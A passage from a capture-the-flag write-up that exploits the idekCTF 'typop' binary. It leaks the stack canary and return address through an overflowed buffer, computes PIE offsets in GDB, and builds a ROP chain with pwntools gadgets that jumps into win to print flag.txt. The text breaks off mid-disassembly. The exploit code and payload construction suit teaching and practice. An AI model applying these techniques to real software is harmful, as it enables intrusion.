IdekCTF 2022 - typop: A Joyful ROP

I finally have time to start participating in CTFs again, so I decided to kick 2023 off with idekCTF 2022 this last weekend. While I usually focus more on web and misc challenges, I decided to dedicate the last day of the CTF to focusing on pwn challenges. This write-up is about a pwn challenge called typop by JW#9396.

The Challenge

Typop is a binary exploitation (pwn) challenge: you connect to a remote service and use your ability to interact with the running program to exploit it and read the flag.

The challenge starts out with the following prompt:

While writing the feedback form for idekCTF, JW made a small typo. It still compiled though, so what could possibly go wrong?

A command is provided for connecting to the program using netcat:

nc typop.chal.idek.team 1337

Connecting to it we see that it's a simple program that runs in a loop and asks for survey feedback with a couple of prompts:

$ nc typop.chal.idek.team 1337
== proof-of-work: disabled ==
Do you want to complete a survey?
y
Do you like ctf?
maybe
You said: maybe

Aww :( Can you provide some extra feedback?
no
Do you want to complete a survey?
y
Do you like ctf?
yeah sure
You said: yeah sure

That's great! Can you provide some extra feedback?
no
Do you want to complete a survey?
no

An attachment called typop.tar was provided with the following files:

$ tar xvf typop.tar
attachments/
attachments/chall
attachments/Dockerfile
attachments/flag.txt
$ ls -l attachments/
total 28
-rwxr-xr-x. 1 james james 17160 Jan 13 14:54 chall
-rwxr-xr-x. 1 james james   155 Jan 13 14:54 Dockerfile
-rwxr-xr-x. 1 james james    16 Jan 13 14:54 flag.txt

Dockerfile and flag.txt are included to show how the remote service has been set up and configured. The file chall contains a copy of the file running on the remote server so we can analyze it and test our exploit locally first. This file is a standard amd64 Linux ELF binary with a number of protections enabled:

$ file attachments/chall
attachments/chall: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV),
dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2,
BuildID[sha1]=47348e907e6bd456810c6015278d5e43110c8318, for GNU/Linux 3.2.0, not
stripped
$ pwn checksec attachments/chall
[*] '/home/james/src/idekctf-typop/attachments/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

With all of these details in mind, we can start analyzing the binary.

Analyzing the Binary

Ghidra is a software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission. It's a great open source tool one can use to try and safely determine what a binary does. We'll be using the decompiler feature to look at the various functions in our binary.

Note: I've included my own conceptual reconstruction of typop.c here for reference.

Creating a new project and loading the binary into Ghidra, we can auto analyze it and have it decompile all of the code. From there, the entry point (in this case, main) is a good place to start understanding the code:

undefined8 main(void)
{
  int iVar1;
  
  setvbuf(stdout,(char *)0x0,2,0);
  while( true ) {
    iVar1 = puts("Do you want to complete a survey?");
    if (iVar1 == 0) {
      return 0;
    }
    iVar1 = getchar();
    if (iVar1 != 0x79) break;
    getchar();
    getFeedback();
  }
  return 0;
}

If we clean this up a bit, we can imagine the original code looking like this:

int main(void)
{
  int res;
  setvbuf(stdout, NULL, _IONBF, 0);
  while (true) {
    res = puts("Do you want to complete a survey?");
    if (res == 0) {
      return 0;
    }
    res = getchar();
    if (res != 'y') break;
    getchar();
    getFeedback();
  }
  return 0;
}

Now we can take a look at getFeedback(). Ghidra gives us this:

void getFeedback(void)

{
  long in_FS_OFFSET;
  undefined8 local_1a;
  undefined2 local_12;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_1a = 0;
  local_12 = 0;
  puts("Do you like ctf?");
  read(0,&local_1a,0x1e);
  printf("You said: %s\n",&local_1a);
  if ((char)local_1a == 'y') {
    printf("That\'s great! ");
  }
  else {
    printf("Aww :( ");
  }
  puts("Can you provide some extra feedback?");
  read(0,&local_1a,0x5a);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

The in_FS_OFFSET bits are Ghidra's attempt to represent the canary-based stack protection that the compiler added to the binary. Ghidra can't always represent what it decompiles accurately. It also doesn't always recover arrays: here the 10-byte buffer shows up as two separate variables, the 8-byte local_1a and the 2-byte local_12. With that in mind, we can imagine the original code looking more like this:

void getFeedback()
{
  char buf[10] = {0};
  puts("Do you like ctf?");
  read(STDIN_FILENO, buf, 30);
  printf("You said: %s\n", buf);
  if (buf[0] == 'y') {
    printf("That\'s great! ");
  }
  else {
    printf("Aww :( ");
  }
  puts("Can you provide some extra feedback?");
  read(STDIN_FILENO, buf, 90);
}

There are some important take-aways from this code:

We use a local array buf and read more data into it than it can hold. This means we can overflow a buffer on the stack and write any stack values we want.
We use the read function to store the user input, which means we aren't restricted in what byte values the user can store (many other functions will stop reading when they see certain values such as NUL bytes or line endings).
We print out the contents of buf after we corrupt it, allowing us to leak existing data from the stack.
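To make the first take-away concrete, here is a small Python sketch of the stack frame as seen from the start of buf. The offsets are assumptions taken from the getFeedback disassembly shown later in this write-up (buf at -0x12(%rbp), canary at -0x8(%rbp)); the names FRAME and reach are only for illustration.

```python
# Layout of getFeedback's frame, in bytes, starting at buf.
# Assumption: buf is at rbp-0x12 and the canary at rbp-0x8, as in the
# getFeedback disassembly.
FRAME = [
    ("buf", 10),
    ("canary", 8),
    ("saved rbp", 8),
    ("return address", 8),
]

def reach(read_size):
    """Return how many bytes of each field a read of read_size bytes can touch."""
    touched = {}
    offset = 0
    for name, size in FRAME:
        covered = max(0, min(size, read_size - offset))
        if covered:
            touched[name] = covered
        offset += size
    return touched

first = reach(30)   # read(STDIN_FILENO, buf, 30)
second = reach(90)  # read(STDIN_FILENO, buf, 90)
print(first)
print(second)
```

Under these assumptions the first read can reach the canary, the saved rbp, and the low 4 bytes of the return address, while the second read covers the whole frame with 56 bytes to spare.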

Additionally, amongst the handful of functions we see something called win:

void win(undefined param_1,undefined param_2,undefined param_3)

{
  FILE *__stream;
  long in_FS_OFFSET;
  undefined8 local_52;
  undefined2 local_4a;
  undefined8 local_48;
  undefined8 local_40;
  undefined8 local_38;
  undefined8 local_30;
  undefined8 local_28;
  undefined8 local_20;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_4a = 0;
  local_52 = CONCAT17(0x74,CONCAT16(0x78,CONCAT15(0x74,CONCAT14(0x2e,CONCAT13(0x67,CONCAT12(param_3,
                                                  CONCAT11(param_2,param_1)))))));
  __stream = fopen((char *)&local_52,"r");
  if (__stream == (FILE *)0x0) {
    puts("Error opening flag file.");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  local_48 = 0;
  local_40 = 0;
  local_38 = 0;
  local_30 = 0;
  local_28 = 0;
  local_20 = 0;
  fgets((char *)&local_48,0x20,__stream);
  puts((char *)&local_48);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

Cleaning this up gives us something like the following:

void win(char c1, char c2, char c3)
{
  FILE *f;
  int res;
  char buf[48] = {0};
  char filename[10] = {c1, c2, c3, 'g', '.', 't', 'x', 't', '\0'};
  f = fopen(filename, "r");
  if (f == NULL) {
    puts("Error opening flag file.");
    exit(1);
  }
  fgets(buf, 32, f);
  puts(buf);
}

The binary already includes a function we can call as win('f', 'l', 'a') to open the file flag.txt in the current directory and print it out. The Dockerfile shows us that this is exactly what we need to win:


FROM pwn.red/jail
COPY --from=ubuntu:20.04 / /srv
RUN mkdir /srv/app
ADD chall /srv/app/run
ADD flag.txt /srv/app/flag.txt
RUN chmod +x /srv/app/run

Of course, at this point, we know we can overflow a buffer on the stack. What's stopping us from just injecting and executing some code? Why not just spawn a shell and do whatever we want?

Unfortunately, this binary has NX (no-execute) enabled. Linux marks the stack as non-executable for this binary, which prevents code placed on the stack from being executed:

$ pwn checksec attachments/chall
[*] '/home/james/src/idekctf-typop/attachments/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Despite this and other protections, we can still use a technique called return-oriented programming (ROP) to take advantage of the buffer overflow and get the flag.

Return-Oriented Programming

Normally buffer overflows are exploited in "stack smashing" attacks by overwriting the stack with a carefully crafted payload that includes a return address to the payload's location on the stack and a sequence of machine code instructions to execute.

Unfortunately, in our case, the NX stack protection prevents any shellcode written to the stack from ever executing.

To overcome this form of protection, a different form of stack smashing attack has become popular. Instead of storing code in the stack, it relies on existing code already within the binary.

If we look carefully at the machine code present within a binary, we can often find sequences of code that do useful operations followed by a ret opcode. ret is great because it pops the value at the top of the stack into the instruction pointer and continues execution at that address.

We call these useful sequences of code "gadgets", and we can easily craft a sequence of instruction pointers on the stack to these gadgets that will call them in a specific sequence.

Because this form of exploit leverages the existence of ret instructions in the code to control the execution, it is called Return-Oriented Programming (ROP).
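As a rough illustration of the idea, here is a toy Python model of a ROP chain. It does not execute machine code; it only mimics how each ret pops the next gadget address and how each pop inside a gadget consumes one more stack slot. The gadget addresses 0x1000 and 0x2000 and the helper run_chain are made up for this sketch.

```python
# Toy model of a ROP chain: control flow only, no real machine code.
# The addresses below are hypothetical placeholders.
GADGETS = {
    0x1000: ("pop rdi; ret", ["rdi"]),
    0x2000: ("pop rsi; pop r15; ret", ["rsi", "r15"]),
}

def run_chain(stack, gadgets):
    """Walk the fake stack the way a chain of ret instructions would."""
    stack = list(stack)          # index 0 is the top of the stack
    regs = {}
    trace = []
    while stack:
        addr = stack.pop(0)      # ret: pop the next address and jump to it
        name, pops = gadgets[addr]
        trace.append(name)
        for reg in pops:         # each pop in the gadget eats one stack slot
            regs[reg] = stack.pop(0)
    return regs, trace

chain = [0x1000, ord("f"), 0x2000, ord("l"), 0]
regs, trace = run_chain(chain, GADGETS)
print(trace)
print(regs)
```

The attacker never supplies instructions, only the list of addresses and data values that the existing code pops off the stack.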

Applying ROP to "win"

To utilize ROP, we need some function or code that we want to execute that already exists in the binary. We already discovered a very useful win function in the analysis stage.

Unfortunately, our binary was built as a Position-Independent Executable (PIE):

$ pwn checksec attachments/chall
[*] '/home/james/src/idekctf-typop/attachments/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Because the binary is position-independent, Linux can apply Address Space Layout Randomization (ASLR) to it. With ASLR, Linux loads the binary's code at a different base address every time the program runs. This means that any absolute addresses we determine from one execution will be useless for the next one.

We can verify this by checking the address of win across multiple runs (note that we have to turn off a gdb feature that disables ASLR when debugging):

(gdb) set disable-randomization off
(gdb) break main
Breakpoint 1 at 0x1418
(gdb) run
Starting program: /home/james/src/idekctf-typop/attachments/chall
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".

Breakpoint 1, 0x0000564d96503418 in main ()
(gdb) print win
$2 = {<text variable, no debug info>} 0x564d96503249 <win>
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/james/src/idekctf-typop/attachments/chall
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".

Breakpoint 1, 0x00005566e9de0418 in main ()
(gdb) print win
$3 = {<text variable, no debug info>} 0x5566e9de0249 <win>
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/james/src/idekctf-typop/attachments/chall
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".

Breakpoint 1, 0x0000556227548418 in main ()
(gdb) print win
$4 = {<text variable, no debug info>} 0x556227548249 <win>
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/james/src/idekctf-typop/attachments/chall
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".

Breakpoint 1, 0x0000557781cc6418 in main ()
(gdb) print win
$5 = {<text variable, no debug info>} 0x557781cc6249 <win>

Getting Based

The good news is that the code we want to run (win) and the code we have an address for (main) are in the same segment, so they always have the same relative locations to each other.
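A quick way to convince ourselves is to feed the addresses from the four GDB runs above into Python. The list RUNS simply copies the breakpoint address in main and the address of win from each run; nothing else is assumed.

```python
# (breakpoint in main, address of win) pairs copied from the four GDB runs.
RUNS = [
    (0x0000564D96503418, 0x564D96503249),
    (0x00005566E9DE0418, 0x5566E9DE0249),
    (0x0000556227548418, 0x556227548249),
    (0x0000557781CC6418, 0x557781CC6249),
]

# The distance between the two symbols in each run.
deltas = {main_bp - win for main_bp, win in RUNS}
# The offset of win within its 4 KiB page in each run.
page_offsets = {win & 0xFFF for _, win in RUNS}

print([hex(d) for d in deltas])
print([hex(p) for p in page_offsets])
```

Both sets contain a single value: the base address moves between runs, but the distance between the two locations does not.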

In addition, if we look carefully at getFeedback, we notice that we have an opportunity to leak the return address from the stack with the first overflow:

void getFeedback()
{
  char buf[10] = {0};
  puts("Do you like ctf?");
  read(STDIN_FILENO, buf, 30);
  printf("You said: %s\n", buf);
  if (buf[0] == 'y') {
    printf("That\'s great! ");
  }
  else {
    printf("Aww :( ");
  }
  puts("Can you provide some extra feedback?");
  read(STDIN_FILENO, buf, 90);
}

The %s conversion in the call to printf keeps printing until it finds a NUL byte (0x00 in memory). If we fill the buffer and everything after it with non-NUL bytes, printf runs past our input and leaks whatever stack data follows, as far as the 30-byte first read lets us reach. This includes the address of the previous stack frame and the return address to main.
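Turning the leaked bytes back into a number could look like the sketch below. The helper parse_leak and the 26-byte filler length (10 bytes of buf, 8 of canary, 8 of saved rbp) are assumptions for illustration, and the sample output is simulated from an address seen in GDB rather than captured from the service.

```python
PREFIX = b"You said: "

def parse_leak(output, filler_len):
    """Extract a little-endian pointer printed right after our filler bytes."""
    leaked = output[len(PREFIX) + filler_len:]
    if leaked.endswith(b"\n"):
        leaked = leaked[:-1]     # drop the newline added by the format string
    # printf stopped at the first NUL, so pad the missing high bytes with zeros.
    return int.from_bytes(leaked.ljust(8, b"\x00"), "little")

# Simulated output: 26 filler bytes followed by the 6 non-NUL bytes of
# the return address 0x0000562fb377d447.
sample = PREFIX + b"A" * 26 + bytes.fromhex("47d477b32f56") + b"\n"
leaked_ret = parse_leak(sample, 26)
print(hex(leaked_ret))
```

If the pointer happens to contain a NUL byte in the middle, the leak comes out short and the parsed value is wrong, so a real exploit would want to sanity-check the result.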

We can easily figure out ahead of time what the relative offset is between this return address and the win function by running the code in GDB:

(gdb) break getFeedback
Breakpoint 1 at 0x55c92b269350
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/james/src/idekctf-typop/attachments/chall
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Do you want to complete a survey?
y

Breakpoint 1, 0x0000562fb377d350 in getFeedback ()
(gdb) x/2gx $rsp
0x7ffce2f1e370: 0x00007ffce2f1e380      0x0000562fb377d447
(gdb) print win
$5 = {<text variable, no debug info>} 0x562fb377d249 <win>
(gdb) print 0x0000562fb377d447 - 0x562fb377d249
$6 = 510
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/james/src/idekctf-typop/attachments/chall
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Do you want to complete a survey?
y

Breakpoint 1, 0x0000559e1a7f1350 in getFeedback ()
(gdb) x/2gx $rsp
0x7ffc24b82480: 0x00007ffc24b82490      0x0000559e1a7f1447
(gdb) print win
$7 = {<text variable, no debug info>} 0x559e1a7f1249 <win>
(gdb) print 0x0000559e1a7f1447 - 0x559e1a7f1249
$8 = 510

You can also disassemble the code to figure out the offset without running anything. Compare the relative offset of the instruction in main right after call getFeedback to the relative address of win:

$ gdb ./chall
Reading symbols from ./chall...
(No debugging symbols found in ./chall)
(gdb) print win
$1 = {<text variable, no debug info>} 0x1249 <win>
(gdb) disassemble main
Dump of assembler code for function main:
   0x0000000000001410 <+0>:     endbr64
   0x0000000000001414 <+4>:     push   %rbp
   0x0000000000001415 <+5>:     mov    %rsp,%rbp
   0x0000000000001418 <+8>:     mov    0x2bf1(%rip),%rax        # 0x4010 <stdout@@GLIBC_2.2.5>
   0x000000000000141f <+15>:    mov    $0x0,%ecx
   0x0000000000001424 <+20>:    mov    $0x2,%edx
   0x0000000000001429 <+25>:    mov    $0x0,%esi
   0x000000000000142e <+30>:    mov    %rax,%rdi
   0x0000000000001431 <+33>:    call   0x1130 <setvbuf@plt>
   0x0000000000001436 <+38>:    jmp    0x1447 <main+55>
   0x0000000000001438 <+40>:    call   0x1120 <getchar@plt>
   0x000000000000143d <+45>:    mov    $0x0,%eax
   0x0000000000001442 <+50>:    call   0x1348 <getFeedback>
   0x0000000000001447 <+55>:    lea    0xc3a(%rip),%rdi        # 0x2088
   0x000000000000144e <+62>:    call   0x10d0 <puts@plt>
   0x0000000000001453 <+67>:    test   %eax,%eax
   0x0000000000001455 <+69>:    je     0x1461 <main+81>
   0x0000000000001457 <+71>:    call   0x1120 <getchar@plt>
   0x000000000000145c <+76>:    cmp    $0x79,%eax
   0x000000000000145f <+79>:    je     0x1438 <main+40>
   0x0000000000001461 <+81>:    mov    $0x0,%eax
   0x0000000000001466 <+86>:    pop    %rbp
   0x0000000000001467 <+87>:    ret
End of assembler dump.
(gdb) print 0x1447 - 0x1249
$2 = 510

Once we manage to leak the return address, no matter what it is, we can subtract 510 from it to get the address we need to call win.
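In Python the calculation is a one-liner. The helper names win_from_leak and base_from_leak are made up for this sketch; the constants come from the disassembly above, and the sample values are the return addresses seen in the two GDB runs.

```python
RET_OFFSET = 0x1447   # instruction in main right after call getFeedback
WIN_OFFSET = 0x1249   # start of win

def win_from_leak(leaked_ret):
    """Address of win in the running process, given the leaked return address."""
    return leaked_ret - (RET_OFFSET - WIN_OFFSET)   # subtract 510

def base_from_leak(leaked_ret):
    """Load address of the binary, given the leaked return address."""
    return leaked_ret - RET_OFFSET

for leak in (0x0000562FB377D447, 0x0000559E1A7F1447):
    print(hex(leak), hex(win_from_leak(leak)), hex(base_from_leak(leak)))
```

Recovering the base address as well is handy because every other offset in the binary can then be turned into an absolute address the same way.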

Winning Arguments

Now that we have an idea of what address to call, we need to figure out how to set the arguments for win. Remember that it takes three values, and that we want to set them to 'f', 'l', and 'a' respectively.

The way we specify the arguments for a function call is defined by something called an Application Binary Interface (ABI). On amd64 Linux, this is specified by a standard known as the System V ABI which you can find and read as a PDF.

On amd64 Linux, this specification says that the first 6 function parameters will be passed using the registers rdi, rsi, rdx, rcx, r8, r9 respectively. This means we need a way to set rdi, rsi, and rdx without being able to inject and run our own machine code.

All we have is the ability to place addresses on the stack. This lets us return into functions, but we can't set any registers directly this way. How can we call functions with arguments?

Go Go Gadget to the Rescue

To manipulate registers, we want to find code we can jump to that moves values from the stack to the desired registers and then returns as soon as possible. Code following this pattern is often called "ROP Gadgets" and a variety of tools are designed to find them.

Let's use the Python pwntools library to search for some ROP gadgets to set rdi, rsi, and rdx within our binary:

$ python
>>> import pwn
>>> elf = pwn.ELF("./chall")
[*] '/home/james/src/idekctf-typop/attachments/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
>>> rop = pwn.ROP(elf)
[*] Loading gadgets for '/home/james/src/idekctf-typop/attachments/chall'
>>> rop.rdi
Gadget(0x14d3, ['pop rdi', 'ret'], ['rdi'], 0x8)
>>> rop.rsi
Gadget(0x14d1, ['pop rsi', 'pop r15', 'ret'], ['rsi', 'r15'], 0xc)
>>> rop.rdx
>>> # Uh oh

We run into a problem here because there's no obvious gadget for setting our third argument, rdx.
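To see how far the two gadgets we did find would get us, here is a sketch that packs them into a partial chain using only the standard library. The gadget offsets are the ones pwntools reported above; the helper names p64 and partial_chain and the example base address are assumptions for illustration.

```python
import struct

POP_RDI = 0x14D3       # pop rdi; ret
POP_RSI_R15 = 0x14D1   # pop rsi; pop r15; ret

def p64(value):
    """Pack a 64-bit little-endian value, as it would sit on the stack."""
    return struct.pack("<Q", value)

def partial_chain(base):
    """Chain that sets rdi='f' and rsi='l'. There is no gadget for rdx."""
    return b"".join([
        p64(base + POP_RDI), p64(ord("f")),
        p64(base + POP_RSI_R15), p64(ord("l")), p64(0),  # 0 is junk for r15
    ])

chain = partial_chain(0x562FB377C000)  # example base address, not a real leak
print(chain.hex())
```

The chain sets two of the three arguments, but without a way to load rdx the third character of the filename would be whatever happens to be in that register.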

Missing Gadget Workaround

We can't set the third argument to call win directly, so what do we do? Let's look at the important parts of win:

void win(char c1, char c2, char c3)
{
  FILE *f;
  int res;
  char buf[48] = {0};
  char filename[10] = {c1, c2, c3, 'g', '.', 't', 'x', 't', '\0'};
  f = fopen(filename, "r");
  if (f == NULL) {
    puts("Error opening flag file.");
    exit(1);
  }
  fgets(buf, 32, f);
  puts(buf);
}

None of the operations we care about have dependencies on the previous code aside from the filename. If we can get the correct filename into the fopen code, we can skip setting any other arguments completely. Let's look at this in assembly to get a better idea of what's happening:

(gdb) disas win
Dump of assembler code for function win:
   0x0000000000001249 <+0>:	endbr64 
   0x000000000000124d <+4>:	push   %rbp
   0x000000000000124e <+5>:	mov    %rsp,%rbp
   0x0000000000001251 <+8>:	sub    $0x70,%rsp
   0x0000000000001255 <+12>:	mov    %esi,%ecx
   0x0000000000001257 <+14>:	mov    %edx,%eax
   0x0000000000001259 <+16>:	mov    %edi,%edx
   0x000000000000125b <+18>:	mov    %dl,-0x64(%rbp)
   0x000000000000125e <+21>:	mov    %ecx,%edx
   0x0000000000001260 <+23>:	mov    %dl,-0x68(%rbp)
   0x0000000000001263 <+26>:	mov    %al,-0x6c(%rbp)
   0x0000000000001266 <+29>:	mov    %fs:0x28,%rax
   0x000000000000126f <+38>:	mov    %rax,-0x8(%rbp)
   0x0000000000001273 <+42>:	xor    %eax,%eax
   0x0000000000001275 <+44>:	movq   $0x0,-0x4a(%rbp)
   0x000000000000127d <+52>:	movw   $0x0,-0x42(%rbp)
   0x0000000000001283 <+58>:	movzbl -0x64(%rbp),%eax
   0x0000000000001287 <+62>:	mov    %al,-0x4a(%rbp)
   0x000000000000128a <+65>:	movzbl -0x68(%rbp),%eax
   0x000000000000128e <+69>:	mov    %al,-0x49(%rbp)
   0x0000000000001291 <+72>:	movzbl -0x6c(%rbp),%eax
   0x0000000000001295 <+76>:	mov    %al,-0x48(%rbp)
   0x0000000000001298 <+79>:	movb   $0x67,-0x47(%rbp)
   0x000000000000129c <+83>:	movb   $0x2e,-0x46(%rbp)
   0x00000000000012a0 <+87>:	movb   $0x74,-0x45(%rbp)
   0x00000000000012a4 <+91>:	movb   $0x78,-0x44(%rbp)
   0x00000000000012a8 <+95>:	movb   $0x74,-0x43(%rbp)
   0x00000000000012ac <+99>:	lea    -0x4a(%rbp),%rax
   0x00000000000012b0 <+103>:	lea    0xd51(%rip),%rsi        # 0x2008
   0x00000000000012b7 <+110>:	mov    %rax,%rdi
   0x00000000000012ba <+113>:	call   0x1140 <fopen@plt>
   0x00000000000012bf <+118>:	mov    %rax,-0x58(%rbp)
   0x00000000000012c3 <+122>:	cmpq   $0x0,-0x58(%rbp)
   0x00000000000012c8 <+127>:	jne    0x12e0 <win+151>
   0x00000000000012ca <+129>:	lea    0xd39(%rip),%rdi        # 0x200a
   0x00000000000012d1 <+136>:	call   0x10d0 <puts@plt>
   0x00000000000012d6 <+141>:	mov    $0x1,%edi
   0x00000000000012db <+146>:	call   0x1150 <exit@plt>
   0x00000000000012e0 <+151>:	movq   $0x0,-0x40(%rbp)
   0x00000000000012e8 <+159>:	movq   $0x0,-0x38(%rbp)
   0x00000000000012f0 <+167>:	movq   $0x0,-0x30(%rbp)
   0x00000000000012f8 <+175>:	movq   $0x0,-0x28(%rbp)
   0x0000000000001300 <+183>:	movq   $0x0,-0x20(%rbp)
   0x0000000000001308 <+191>:	movq   $0x0,-0x18(%rbp)
   0x0000000000001310 <+199>:	mov    -0x58(%rbp),%rdx
   0x0000000000001314 <+203>:	lea    -0x40(%rbp),%rax
   0x0000000000001318 <+207>:	mov    $0x20,%esi
   0x000000000000131d <+212>:	mov    %rax,%rdi
   0x0000000000001320 <+215>:	call   0x1110 <fgets@plt>
   0x0000000000001325 <+220>:	lea    -0x40(%rbp),%rax
   0x0000000000001329 <+224>:	mov    %rax,%rdi
   0x000000000000132c <+227>:	call   0x10d0 <puts@plt>
   0x0000000000001331 <+232>:	nop
   0x0000000000001332 <+233>:	mov    -0x8(%rbp),%rax
   0x0000000000001336 <+237>:	xor    %fs:0x28,%rax
   0x000000000000133f <+246>:	je     0x1346 <win+253>
   0x0000000000001341 <+248>:	call   0x10e0 <__stack_chk_fail@plt>
   0x0000000000001346 <+253>:	leave  
   0x0000000000001347 <+254>:	ret    
End of assembler dump.

Pay attention to the way the existing code sets up the call to fopen and then displays the contents. If we can set up a stack frame with "flag.txt\0" at -0x4a from %rbp, then the rest of this code will do what we need without having to set any registers. All we have to do is jump to win+99 instead of calling win directly.

A quick search for ROP gadgets that modify %rbp gives us something useful:

$ python
>>> import pwn
>>> elf = pwn.ELF("./chall")
[*] '/home/james/src/idekctf-typop/attachments/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
>>> rop = pwn.ROP(elf)
[*] Loading gadgets for '/home/james/src/idekctf-typop/attachments/chall'
>>> rop.rbp
Gadget(0x1233, ['pop rbp', 'ret'], ['rbp'], 0x8)

Some more debugger math determines the offsets we need to subtract from the return address we can leak from getFeedback:

(gdb) disassemble main
Dump of assembler code for function main:
   0x0000000000001410 <+0>:	endbr64 
   0x0000000000001414 <+4>:	push   %rbp
   0x0000000000001415 <+5>:	mov    %rsp,%rbp
   0x0000000000001418 <+8>:	mov    0x2bf1(%rip),%rax        # 0x4010 <stdout@@GLIBC_2.2.5>
   0x000000000000141f <+15>:	mov    $0x0,%ecx
   0x0000000000001424 <+20>:	mov    $0x2,%edx
   0x0000000000001429 <+25>:	mov    $0x0,%esi
   0x000000000000142e <+30>:	mov    %rax,%rdi
   0x0000000000001431 <+33>:	call   0x1130 <setvbuf@plt>
   0x0000000000001436 <+38>:	jmp    0x1447 <main+55>
   0x0000000000001438 <+40>:	call   0x1120 <getchar@plt>
   0x000000000000143d <+45>:	mov    $0x0,%eax
   0x0000000000001442 <+50>:	call   0x1348 <getFeedback>
   0x0000000000001447 <+55>:	lea    0xc3a(%rip),%rdi        # 0x2088
   0x000000000000144e <+62>:	call   0x10d0 <puts@plt>
   0x0000000000001453 <+67>:	test   %eax,%eax
   0x0000000000001455 <+69>:	je     0x1461 <main+81>
   0x0000000000001457 <+71>:	call   0x1120 <getchar@plt>
   0x000000000000145c <+76>:	cmp    $0x79,%eax
   0x000000000000145f <+79>:	je     0x1438 <main+40>
   0x0000000000001461 <+81>:	mov    $0x0,%eax
   0x0000000000001466 <+86>:	pop    %rbp
   0x0000000000001467 <+87>:	ret    
End of assembler dump.
(gdb) print main+55
$2 = (<text variable, no debug info> *) 0x1447 <main+55>
(gdb) print win+99
$3 = (<text variable, no debug info> *) 0x12ac <win+99>
(gdb) print 0x1447 - 0x12ac
$4 = 411
(gdb) print 0x1447 - 0x1233
$5 = 532

Once we leak the stack address and return address, we can construct the following ROP chain (note that I'm following GDB's convention of increasing addresses downwards):

stack_address
return_address - 532
stack_address + 16 + 0x4a
return_address - 411
"flag.txt\0"

We set rbp to stack_address + 16 + 0x4a. The "flag.txt" string sits 16 bytes above stack_address (the saved frame pointer we leaked, which itself points 16 bytes above getFeedback's frame base), and the code in win looks for the filename at -0x4a from rbp, so adding 0x4a makes it find our string.
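Put together as bytes for the second read, the chain could be built like the sketch below. It assumes the canary, stack_address, and return_address have already been leaked, and that buf is 10 bytes followed directly by the canary (as in the getFeedback disassembly). The helper name build_payload and the canary value in the example are placeholders.

```python
import struct

def build_payload(canary, stack_address, return_address):
    """Bytes for the second read: filler, canary, then the ROP chain."""
    parts = [
        b"A" * 10,                                    # fill buf
        struct.pack("<Q", canary),                    # keep the canary intact
        struct.pack("<Q", stack_address),             # saved rbp, unchanged
        struct.pack("<Q", return_address - 532),      # pop rbp; ret
        struct.pack("<Q", stack_address + 16 + 0x4A), # new rbp
        struct.pack("<Q", return_address - 411),      # win+99
        b"flag.txt\x00",                              # filename at new rbp-0x4a
    ]
    return b"".join(parts)

# stack_address and return_address come from the GDB session in this
# write-up; the canary is an arbitrary example value.
payload = build_payload(0xEFECC9BABCF8FC00, 0x00007FFE664A6D60, 0x0000561A105AA447)
print(len(payload), payload[26:].hex())
```

The result is 59 bytes long, comfortably inside the 90 bytes the second read accepts.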

Before we continue, we can test out our idea in GDB to check our numbers:

$ gdb --args ./chall
Reading symbols from ./chall...
(No debugging symbols found in ./chall)
(gdb) disas getFeedback
Dump of assembler code for function getFeedback:
   0x0000000000001348 <+0>:	endbr64 
   0x000000000000134c <+4>:	push   %rbp
   0x000000000000134d <+5>:	mov    %rsp,%rbp
   0x0000000000001350 <+8>:	sub    $0x20,%rsp
   0x0000000000001354 <+12>:	mov    %fs:0x28,%rax
   0x000000000000135d <+21>:	mov    %rax,-0x8(%rbp)
   0x0000000000001361 <+25>:	xor    %eax,%eax
   0x0000000000001363 <+27>:	movq   $0x0,-0x12(%rbp)
   0x000000000000136b <+35>:	movw   $0x0,-0xa(%rbp)
   0x0000000000001371 <+41>:	lea    0xcab(%rip),%rdi        # 0x2023
   0x0000000000001378 <+48>:	call   0x10d0 <puts@plt>
   0x000000000000137d <+53>:	lea    -0x12(%rbp),%rax
   0x0000000000001381 <+57>:	mov    $0x1e,%edx
   0x0000000000001386 <+62>:	mov    %rax,%rsi
   0x0000000000001389 <+65>:	mov    $0x0,%edi
   0x000000000000138e <+70>:	call   0x1100 <read@plt>
   0x0000000000001393 <+75>:	lea    -0x12(%rbp),%rax
   0x0000000000001397 <+79>:	mov    %rax,%rsi
   0x000000000000139a <+82>:	lea    0xc93(%rip),%rdi        # 0x2034
   0x00000000000013a1 <+89>:	mov    $0x0,%eax
